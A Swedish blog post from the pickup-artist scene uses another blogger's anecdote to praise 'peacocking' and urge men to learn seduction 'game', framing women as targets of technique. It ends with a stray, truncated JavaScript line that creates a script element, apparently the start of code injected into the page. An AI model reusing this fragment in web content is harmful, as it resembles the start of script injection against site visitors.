Har precis läst Katrin Schulmans blogg och det slutar aldrig att förvåna mig hur bra konceptet peacocking fungerar.

http://blogg.stureplan.se/katrin/2007/11/27/hojden-av-pinsamhet/

Hon börjar med att beskriva hur gråa och trista ”normala människor” klär sig på Hotell Anglais en vardag förmiddag mitt i stureplan.
Dessa ”normala människor” som gör allt för klä dig trendigt, lyckas inte på något sätt väcka hennes uppmärksamhet.

De är trendslavar och gör allt för att passa in i den sociala klädnormen som kallas för mode.

Däremot så lyckas killen som kommer in i linne, sätta sig i hennes hjärnbalk. Så pass att hon sätter kaffet i halsen och börjar skruva på sig efter en dold kamera.

Hon börjar instinktivt fantisera om han stått framför spegeln och ansett att han sett tipptopp ut! Hon skriver att det hela var obeskrivligt pinsamt men samtidigt undrar hon om han tycker att han är så djävla het att hela världen förtjänar att se han halvnaken mitt i vintern.
Hon spinner vidare i tankar om vad den killen tänker på innan han lämnar sitt hem.

”Fan va jag är het! Nu jävlar ska jag visa upp min heta kropp och alla brudar kommer fan smälla av när jag slajdar in i lobbyn på Anglais!”

Oavsett hennes reaktion så sätter killen igång hennes tankar och snart är alla andra ”normalklädda” människorna bortglömda.

Detta är precis tanken med peacocking. Att få en person att lägga märke till dig genom att sticka ut ifrån mängden. Nu vet jag inte hur kalibrerad den killen var med det är intressant analogi, tagen rakt från en kvinnas tankar.

Vem vet, med en bra övergång en bra historia en väl timad kvalificiering så hade nog fröken blivit upplockad av honom, där och då, mitt på ljusa dagen!
Han kunde med lätthet ha vänt steken till sin fördel genom att personifiera sitt självförtroende.

Men men, everybody doesn’t have GAME.

Det intressanta är att de gråa trista människor som klär i normala kläder. Har säker lagt ut en massa pengar för kläders som får dem att INTE fastna i sexiga kvinnor tankar. Varför?

Sluta klä dig som alla andra och skaffa dig GAME skills, så kommer du förstå att du kan interagera med kvinnor framgångsrikt oavsett klädstil och tid på dagen.

LOVE SUPERMAN

var d=document;var s=d.createElement(‘script’);